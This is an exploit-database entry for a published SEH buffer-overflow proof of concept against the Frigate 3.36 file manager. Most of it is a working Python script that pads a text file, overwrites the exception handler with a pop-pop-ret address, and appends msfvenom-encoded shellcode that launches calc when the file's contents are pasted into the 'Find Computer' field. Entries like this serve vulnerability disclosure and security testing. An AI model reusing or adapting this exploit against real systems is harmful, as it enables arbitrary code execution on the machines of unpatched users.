Frigate 3.36 - Buffer Overflow (SEH)

vendor:

Frigate 3

by:

Xenofon Vassilakopoulos

7.5

CVSS

HIGH

Buffer Overflow

CWE

Product Name: Frigate 3

Affected Version From: 3.36

Affected Version To: 3.36

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 Professional SP1 x86

2020

Frigate 3.36 – Buffer Overflow (SEH)

This exploit allows an attacker to execute arbitrary code on a system running Frigate 3.36. By generating a specially crafted 'test.txt' file and copying its contents to the clipboard, an attacker can trigger a buffer overflow when pasting the contents into Frigate3's 'Find Computer' feature. This results in the execution of the Windows calculator application.

Mitigation:

Apply the latest version of the software or vendor-supplied patch.

Source

Exploit-DB raw data:

# Exploit Title: Frigate 3.36 - Buffer Overflow (SEH)
# Exploit Author: Xenofon Vassilakopoulos
# Date: 2020-05-03
# Version: 3.36
# Vendor Homepage: http://www.Frigate3.com/
# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
# Tested on: Windows 7 Professional SP1 x86

# Steps to reproduce :
# 1. generate the test.txt using this exploit 
# 2. copy the contents of the test.txt to clipboard 
# 3. open Frigate3 then go to Disk -> Find Computer 
# 4. paste the contents to computer name  
# 5. calculator will execute 


import struct

filename = 'test.txt'
junk = "A"*4112 
nseh =  "\xeb\x1A\x90\x90"
seh = struct.pack('L',0x40171c45) # pop esi # pop ebx # ret
nop="\x90"*18
junk2 =  "\x71\x71\x90\x90"


#msfvenom -a x86 --platform windows -p windows/exec  CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python
buf =  b""
buf += b"\x89\xe7\xda\xc7\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
buf += b"\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x68\x68\x6d\x52"
buf += b"\x77\x70\x63\x30\x73\x30\x35\x30\x6d\x59\x38\x65\x34"
buf += b"\x71\x69\x50\x70\x64\x4c\x4b\x56\x30\x44\x70\x6e\x6b"
buf += b"\x36\x32\x74\x4c\x6c\x4b\x30\x52\x76\x74\x4e\x6b\x71"
buf += b"\x62\x51\x38\x64\x4f\x78\x37\x42\x6a\x45\x76\x76\x51"
buf += b"\x4b\x4f\x6e\x4c\x47\x4c\x43\x51\x63\x4c\x44\x42\x36"
buf += b"\x4c\x61\x30\x6f\x31\x38\x4f\x56\x6d\x45\x51\x69\x57"
buf += b"\x38\x62\x6c\x32\x63\x62\x33\x67\x4e\x6b\x76\x32\x42"
buf += b"\x30\x4e\x6b\x50\x4a\x75\x6c\x4c\x4b\x42\x6c\x57\x61"
buf += b"\x51\x68\x6a\x43\x73\x78\x63\x31\x6a\x71\x43\x61\x6e"
buf += b"\x6b\x73\x69\x37\x50\x35\x51\x78\x53\x6e\x6b\x42\x69"
buf += b"\x65\x48\x4a\x43\x36\x5a\x51\x59\x4e\x6b\x46\x54\x4c"
buf += b"\x4b\x53\x31\x69\x46\x70\x31\x49\x6f\x4c\x6c\x4f\x31"
buf += b"\x48\x4f\x66\x6d\x45\x51\x4f\x37\x66\x58\x49\x70\x63"
buf += b"\x45\x5a\x56\x36\x63\x73\x4d\x7a\x58\x65\x6b\x63\x4d"
buf += b"\x34\x64\x44\x35\x4a\x44\x63\x68\x4c\x4b\x33\x68\x44"
buf += b"\x64\x66\x61\x38\x53\x52\x46\x4e\x6b\x34\x4c\x50\x4b"
buf += b"\x6e\x6b\x43\x68\x75\x4c\x76\x61\x6e\x33\x4e\x6b\x55"
buf += b"\x54\x6e\x6b\x53\x31\x38\x50\x4f\x79\x43\x74\x37\x54"
buf += b"\x76\x44\x51\x4b\x31\x4b\x53\x51\x36\x39\x50\x5a\x32"
buf += b"\x71\x79\x6f\x79\x70\x43\x6f\x53\x6f\x52\x7a\x4e\x6b"
buf += b"\x67\x62\x48\x6b\x4e\x6d\x43\x6d\x72\x4a\x47\x71\x6e"
buf += b"\x6d\x4d\x55\x4e\x52\x57\x70\x37\x70\x67\x70\x62\x70"
buf += b"\x32\x48\x70\x31\x6e\x6b\x32\x4f\x6c\x47\x39\x6f\x69"
buf += b"\x45\x4d\x6b\x58\x70\x4e\x55\x4d\x72\x51\x46\x30\x68"
buf += b"\x4e\x46\x6f\x65\x4d\x6d\x6d\x4d\x6b\x4f\x39\x45\x45"
buf += b"\x6c\x33\x36\x53\x4c\x37\x7a\x4b\x30\x49\x6b\x49\x70"
buf += b"\x32\x55\x45\x55\x6d\x6b\x33\x77\x44\x53\x42\x52\x50"
buf += b"\x6f\x43\x5a\x67\x70\x33\x63\x4b\x4f\x59\x45\x42\x43"
buf += b"\x65\x31\x52\x4c\x45\x33\x35\x50\x41\x41"

payload = junk + nseh + seh + nop + junk2 + buf

print "[+] Creating file %s" % filename
with open(filename, 'w') as f:
    f.write(payload)
print "    File created, wrote %d bytes to file" % len(payload)